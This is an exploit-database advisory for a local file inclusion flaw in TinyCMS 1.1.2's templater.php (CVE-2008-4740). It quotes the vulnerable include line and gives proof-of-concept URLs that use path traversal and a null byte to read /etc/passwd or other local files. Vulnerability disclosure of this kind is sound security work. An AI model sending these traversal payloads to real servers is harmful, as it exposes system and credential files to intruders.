TinyCMS 1.1.2 - 'templater.php' Local File Inclusion

Author: cOndemned
type: webapps
platform: php
port: 
date_added: 2008-08-20  
date_updated: 2016-12-20  
verified: 1  
codes: OSVDB-47626;CVE-2008-4740  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6287.txt

ï»¿########################################################################################
#
#   Name        :   tinyCMS 1.1.2 (templater.php) Local File Inclusion Vulnerability
#   Author      :   cOndemned [ Dark-Coders ]
#   Greetz      :   Avantura, str0ke, ZaBeaTy, doctor, voo|doo, sid.psycho, irk4z
#   Conditions  :   Magic quotes gpc = Off / Register Globals = On
#   Other info  :   Prior versions probably are vulnerable too
#
########################################################################################

Source of /modules/ZZ_Templater/templater.php

    [ ... ]

    17.     $ftemplatedir = 'templates/'.$config['template'].'/';
    18.     include('templates/'.$config['template'].'/data.php');      // <--- LFI
    19.     if($tdata['useblocks'] == 1)

    [ ... ]


Proof of Concept :

    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
    http://[host]/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00


Jusf 4 fun

# milw0rm.com [2008-08-21]